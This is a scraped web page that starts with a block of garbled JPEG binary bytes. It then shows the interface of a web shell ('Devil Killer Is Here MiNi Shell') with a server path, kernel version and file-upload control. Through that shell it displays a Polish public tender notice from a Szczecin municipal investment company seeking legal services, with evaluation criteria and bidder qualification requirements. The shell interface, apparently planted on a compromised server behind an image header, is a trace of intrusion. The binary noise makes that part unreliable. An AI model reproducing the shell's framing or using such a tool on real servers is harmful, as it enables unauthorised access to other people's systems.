JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230427/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230427/0019652001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> ŚWIADCZENIE USŁUG PRAWNICZYCH DLA SZCZECIŃSKICH INWESTYCJI MIEJSKICH SP. Z O.O. W SZCZECINIE. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szczecińskie Inwestycje Miejskie Sp. z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 382696215</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Mieszka I 33</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczecin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">71-011</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL424 - Miasto Szczecin</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">91 8173382</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@sim.szczecin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sim.szczecin.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Zastępstwo Inwestorskie </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ŚWIADCZENIE USŁUG PRAWNICZYCH DLA SZCZECIŃSKICH INWESTYCJI MIEJSKICH SP. Z O.O. W SZCZECINIE. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e8adfe9e-e4f9-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00196520</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://portal.smartpzp.pl/sim <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między zamawiającym<br/>a wykonawcami, w szczególności składanie ofert oraz wszelkich oświadczeń i wniosków (w tym o<br/>wyjaśnienie treści swz), a także przekazywanie zawiadomień i informacji odbywa się wyłącznie w<br/>formie elektronicznej za pośrednictwem Platformy Portal Smart PZP (zwanej dalej: „Platformą”) pod<br/>adresem: http://portal.smartpzp.pl/sim</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między zamawiającym a wykonawcami, w szczególności składanie ofert oraz wszelkich<br/>oświadczeń i wniosków (w tym o wyjaśnienie treści swz), a także przekazywanie zawiadomień i<br/>informacji odbywa się wyłącznie w formie elektronicznej za pośrednictwem Platformy Portal Smart PZP<br/>(zwanej dalej: „Platformą”) pod adresem: http://portal.smartpzp.pl/sim.<br/>2. Zamawiający nie będzie udzielał odpowiedzi na pytania do SWZ lub rozpatrywał wniosków dot.<br/>czynności podejmowanych w postępowaniu w przypadku, gdy Wykonawca złoży wniosek w inny<br/>sposób niż za pośrednictwem Platformy (np. na adres e-mail).<br/>3. Składanie ofert następuje za pośrednictwem strony internetowej prowadzonego postępowania -<br/>platformy zakupowej dostępnej pod adresem internetowym: https://portal.smartpzp.pl/sim Przeglądanie<br/>pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta w Systemie,<br/>ani logowania do Systemu.<br/>4.Komunikacja między zamawiającym a wykonawcami, w szczególności składanie ofert oraz wszelkich<br/>oświadczeń i wniosków (w tym o wyjaśnienie treści swz), a także przekazywanie zawiadomień i<br/>informacji odbywa się wyłącznie w formie elektronicznej za pośrednictwem Platformy Portal Smart PZP<br/>(zwanej dalej: „Platformą”) pod adresem: http://portal.smartpzp.pl/sim. 2.Zamawiający nie będzie<br/>udzielał odpowiedzi na pytania do SWZ lub rozpatrywał wniosków dot. czynności podejmowanych w<br/>postępowaniu w przypadku, gdy Wykonawca złoży wniosek w inny sposób niż za pośrednictwem<br/>Platformy (np. na adres e-mail). 5.Składanie ofert następuje za pośrednictwem strony internetowej<br/>prowadzonego postępowania - platformy zakupowej dostępnej pod adresem internetowym:<br/>https://portal.smartpzp.pl/sim Przeglądanie i pobieranie publicznej treści dokumentacji postępowania<br/>nie wymaga posiadania konta w Systemie, ani logowania do Systemu.<br/>minimalnych wymagań technicznych: 1) Oprogramowanie zewnętrzne (dostawcy podpisu<br/>kwalifikowanego): a) Mozzilla Firefox ver. 65 i późniejsze, Google Chrome ver. 66 i późniejsze lub<br/>Opera ver. 58 i późniejsze, Microsoft Edge ver 18 i późniejsze, Internet Explorer 11; b) Lista<br/>zalecanych przeglądarek internetowych: Google Chrome, Mozilla Firefox, Opera. Zalecane jest<br/>używanie najnowszych wersji przeglądarek;<br/>c) system operacyjny Windows 7 i późniejsze.<br/>2) Oprogramowanie wbudowane w SmartPZP:<br/>a) zainstalowane środowisko Java w wersji min. 1.8 (jre);<br/>b) w przypadku przeglądarek Opera, Chrome i Firefox należy doinstalować dodatek do przeglądarki<br/>Szafir SDK Web;<br/>c) oprogramowanie SzafirHost w systemie operacyjnym.<br/>8. Dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w formatach .png, .jpg,<br/>.jpeg, .gif, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .ods, .odp, .odf, .pdf, .zip, .rar, .7zip, .txt, .ath, .xml,<br/>.dwg, .xades, .tar, .7z, .eml, .msg<br/>ZAMAWIAJĄCY ZALECA UŻYCIE FORMATU PDF</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z Rozdziałem XXV SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z Rozdziałem XXV SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SIM/ZP/P/01/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie usług prawniczych polegających na bieżącej obsłudze prawnej Zamawiającego oraz obsłudze prawnej Inwestycji, prowadzonych przez Zamawiającego jako inwestora, a także jako inwestora zastępczego Gminy Miasto Szczecin bądź innych podmiotów, w zakresie prawa obowiązującego na terytorium Rzeczypospolitej Polskiej, z wyłączeniem prawa podatkowego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79100000-5 - Usługi prawnicze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79110000-8 - Usługi w zakresie doradztwa prawnego i reprezentacji prawnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">1.	Warunki na jakich zostaną one udzielone: <br/>a)	przekroczenie 1800 godz. dyżurów w czasie trwania umowy,<br/>b)	powierzenie wykonywania usług, o których mowa w ust. 1 może nastąpić w trakcie trwania umowy, a także po jej zakończeniu,<br/>c)	powierzenie wykonywania usług, o których mowa w ust. 1 może nastąpić: <br/>- w związku z wystąpieniem potrzeby zwiększenia zakresu rzeczowego usług, np. z uwagi na ilość zadań realizowanych przez Zamawiającego wymagających obsługi prawnej lub <br/>- z powodu zmian wynikających z uwarunkowań realizacji zadania inwestycyjnego (w tym w szczególności związanych z postępowaniami administracyjnymi dot. tego zadania, uwarunkowań środowiskowych, wpływu inwestycji sąsiadujących, itp.) lub <br/>- z powodu zmiany stanu prawnego lub wytycznych właściwych instytucji polskich lub UE lub<br/>- w przypadku powierzenia Zamawiającemu nowych zadań gospodarczych lub publicznych;<br/>d)	powierzenie wykonywania usług, o których mowa w ust. 1 nastąpi z uwzględnieniem zmian po negocjacjach z Wykonawcą.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający uzna za najkorzystniejszą ofertę zawierającą najkorzystniejszy bilans punktów w kryteriach:<br/>a)	„Cena ofertowa brutto” (C);<br/>b)	„Doświadczenie Osób skierowanych do realizacji zamówienia (D) i (D1)<br/>c)	„Wysokość Ubezpieczenia Wykonawcy” (U)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Kierownika Zespołu Prawnego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">2) doświadczenie zastępcy Kierownika Zespołu Prawnego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wysokość Ubezpieczenia Wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 4.	sytuacji ekonomicznej lub finansowej: Zamawiający uzna, że wykonawca znajduje się w sytuacji ekonomicznej lub finansowej zapewniającej należyte wykonanie zamówienia, jeżeli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na sumę gwarancyjną nie niższą niż 10.000.000,00 zł. <br/>5.	zdolności technicznej lub zawodowej Zamawiający uzna, że wykonawca posiada wymagane zdolności techniczne i zawodowe zapewniające należyte wykonanie zamówienia, jeżeli wykonawca wykaże, że: <br/>1)	wykonuje lub wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy – w tym okresie minimum 2 usługi prawne na rzecz Zamawiającego w rozumieniu PZP polegające na kompleksowej obsłudze prawnej inwestycji, przez okres co najmniej 12 następujących po sobie miesięcy każda z usług, gdzie co najmniej jedna była lub jest świadczona na rzecz Zamawiającego do którego zadań statutowych należy obsługa procesów inwestycyjnych realizującego inwestycje kubaturowe, drogowe i mostowe <br/>2)	wykonuje lub wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy – w tym okresie, co najmniej 1 usługę świadczoną na rzecz zamawiającego w rozumieniu PZP polegającą na obsłudze prawnej etapu projektowania inwestycji obejmującej budowę, rozbudowę lub przebudowę obiektu użyteczności publicznej o wartości inwestycji nie mniejszej niż 200.000.000 zł brutto.<br/>3)	wykonuje lub wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy – w tym okresie, co najmniej 1 usługę świadczoną na rzecz zamawiającego w rozumieniu PZP, polegającą na obsłudze prawnej etapu realizacji inwestycji obejmującej budowę, rozbudowę lub przebudowę obiektu użyteczności publicznej, o wartości nie mniejszej niż 200.000.000,00 zł brutto,<br/>4)	posiada co najmniej trzyletnie doświadczenie w obsłudze co najmniej dwóch podmiotów świadczących usługi w ogólnym interesie gospodarczym w rozumieniu art. 106 ust. 2 Traktatu o funkcjonowaniu Unii Europejskiej na podstawie umowy wykonawczej zawartej pomiędzy Jednostką Samorządu Terytorialnego a podmiotem, w której posiada 100% udziałów, określającej zasady wykonywania przez podmiot powierzonych jej usług w ogólnym interesie gospodarczym oraz zasady wypłaty rekompensaty za świadczenie ww. usług (nabyte w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy – w tym okresie).<br/>W przypadku składania oferty wspólnej ww. warunek wykonawcy mogą spełniać łącznie, z tym zastrzeżeniem, że warunek, o którym mowa w ppkt 1 musi spełniać jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia w całości. Zamawiający nie dopuszcza łączenia parametrów poszczególnych usług.<br/>6.	Ponadto, w zakresie zdolności technicznej lub zawodowej: Zamawiający uzna, że wykonawca posiada wymagane zdolności techniczne i zawodowe zapewniające należyte wykonanie zamówienia, jeżeli wykonawca dodatkowo wykaże, że dysponuje lub będzie dysponował potencjałem technicznym w postaci osób wyznaczonych imiennie do realizacji zamówienia, w tym: <br/>1)	co najmniej jedną osobą pełniącą funkcję Kierownika Zespołu Prawnego, posiadającą wykształcenie wyższe prawnicze i uprawnienia do wykonywania zawodu radcy prawnego oraz posiadającymi wpis na odpowiednią listę potwierdzającą wykonywanie zawodu adwokata lub radcy prawnego, a także posiadającą łącznie:<br/>a)	co najmniej 15-letnie doświadczenie w świadczeniu usług obsługi prawnej (na stanowisku radcy prawnego lub adwokata) zamawiających w rozumieniu PZP, przy czym w zakres ww. usług powinna wchodzić również obsługa inwestycji realizowanych przez ww. podmioty,<br/>b)	doświadczenie (nabyte w okresie ostatnich 5 lat przed upływem terminu składania ofert) w obsłudze prawnej Zamawiającego w rozumieniu PZP przy realizacji co najmniej 2 inwestycji obejmujących budowę, rozbudowę lub przebudowę obiektu użyteczności publicznej o wartości robót budowalnych co najmniej 200.000.000,00 zł brutto każda (obejmującej zarówno etap przygotowania postępowania o udzielenie zamówienia publicznego jak również etap realizacji umowy zawartej w następstwie tego postępowania), przy czym co najmniej jedna musi być współfinansowana z dotacji z budżetu Państwa oraz co najmniej jedna powinna być realizowana w formule zaprojektuj i wybuduj,<br/>c)	doświadczenie (nabyte w okresie ostatnich 5 lat przed upływem terminu składania ofert) w obsłudze prawnej Zamawiającego w rozumieniu PZP przy realizacji co najmniej 1 inwestycji drogowej lub mostowej lub kubaturowej o wartości co najmniej 20.000.000,00 zł brutto współfinansowanej ze środków unijnych,<br/>d)	doświadczenie (nabyte w okresie ostatnich 5 lat przed upływem terminu składania ofert) w zakresie reprezentacji zamawiającego w rozumieniu PZP w co najmniej 1 postępowaniu przed mediatorem w sprawie zawarcia ugody dotyczącej rozliczenia robót budowlanych związanych z wykonaniem obiektów użyteczności publicznej o wartości przedmiotu sporu nie mniejszej niż 1.000.000 zł brutto, zakończonej zawarciem ugody przed mediatorem,<br/>e)	doświadczenie (nabyte w okresie ostatnich 5 lat przed upływem terminu składania ofert) w zakresie reprezentacji zamawiającego w rozumieniu PZP lub wykonawcy w co najmniej 2 postępowaniach sądowych dotyczących rozliczenia umowy o roboty budowlane z których co najmniej jedno postępowanie powinno dotyczyć sprawy o wartości przedmiotu sporu co najmniej 5.000.000 zł brutto, a co najmniej jedno postępowanie powinno dotyczyć sprawy o wartości przedmiotu sporu co najmniej 20.000.000 zł brutto,<br/>f)	doświadczenie (nabyte w okresie ostatnich 5 lat przed upływem terminu składania ofert) w zakresie świadczenia przez okres co najmniej 24 miesięcy usług doradztwa prawnego na rzecz podmiotu świadczącego usługi w ogólnym interesie gospodarczym w rozumieniu art. 106 ust. 2 Traktatu o funkcjonowaniu Unii Europejskiej, w zakresie obejmującym problemy prawne związane z wykonywaniem przez ww. podmiot umowy wykonawczej zawartej z Jednostką Samorządu Terytorialnego w której Jednostka Samorządu Terytorialnego posiada 100% udziałów, określającej zasady wykonywania przez ten podmiot powierzonych mu usług w ogólnym interesie gospodarczym oraz zasady wypłaty rekompensaty za świadczenie ww. usług, <br/>2)	co najmniej jedną osobą pełniącą funkcję zastępcy Kierownika Zespołu Prawnego, posiadającą wykształcenie wyższe prawnicze i uprawnienia do wykonywania zawodu radcy prawnego o, a także posiadającą łącznie:<br/>a)	co najmniej 10-letnie doświadczenie zawodowe liczone od daty uzyskania uprawnień,<br/>b)	doświadczenie (nabyte w okresie ostatnich 5 lat przed upływem terminu składania ofert) w obsłudze prawnej zamawiającego w rozumieniu PZP przy realizacji co najmniej 2 inwestycji obejmujących budowę, rozbudowę lub przebudowę obiektu użyteczności publicznej z których :<br/>– co najmniej jedna z ww. usług powinna dotyczyć inwestycji o wartości robót budowlanych co najmniej 20.000.000 zł brutto;<br/>- co najmniej jedna z ww. usług powinna dotyczyć inwestycji o wartości robót budowlanych co najmniej 200.000.000,00 zł brutto i powinna obejmować doradztwo prawne na rzecz zamawiającego w rozumieniu PZP zarówno na etapie przygotowania postępowania o udzielenie zamówienia publicznego jak również na etapie realizacji umowy zawartej w następstwie tego postępowania, <br/>- co najmniej jedna z ww. usług powinna dotyczyć inwestycji współfinansowanej ze środków unijnych, <br/>- co najmniej jedna z ww. usług powinna dotyczyć inwestycji współfinansowanej z dotacji z budżetu Państwa,<br/>c) doświadczenie (nabyte w okresie ostatnich 5 lat przed upływem terminu składania ofert) w obsłudze prawnej zamawiającego w rozumieniu PZP przy realizacji co najmniej co najmniej 1 inwestycji obejmującej budowę, rozbudowę lub przebudowę obiektu użyteczności publicznej o wartości robót budowlanych co najmniej 50.000.000,00 zł brutto realizowanej w formule zaprojektuj i wybuduj, przy czym na potwierdzenie spełniania niniejszego warunku wykonawca może powołać się na usługę, wskazaną również na potwierdzenie warunków opisanych w lit. b), jeżeli była realizowana w formule zaprojektuj i wybuduj,<br/>d) doświadczenie (w okresie ostatnich 5 lat przed upływem terminu składania ofert) w zakresie świadczenia usług doradztwa prawnego na rzecz podmiotu świadczącego usługi w ogólnym interesie gospodarczym w rozumieniu art. 106 ust. 2 Traktatu o funkcjonowaniu Unii Europejskiej, w zakresie obejmującym problemy prawne związane z wykonywaniem przez ww. podmiot umowy wykonawczej zawartej z Jednostką Samorządu Terytorialnego w której Jednostka Samorządu Terytorialnego posiada 100% udziałów określającej zasady wykonywania przez ten podmiot powierzonych jej usług w ogólnym interesie gospodarczym oraz zasady wypłaty rekompensaty za świadczenie ww. usług, przez okres co najmniej 24 miesięcy, <br/>Z uwagi na mala liczbę znaków Szczegółowy opis w swz <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	Oświadczenia wykonawcy, w zakresie wynikającym z art. 108 ust. 1 pkt 5 Ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 z późn. zm.), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego wykonawcy należącego do tej samej grupy 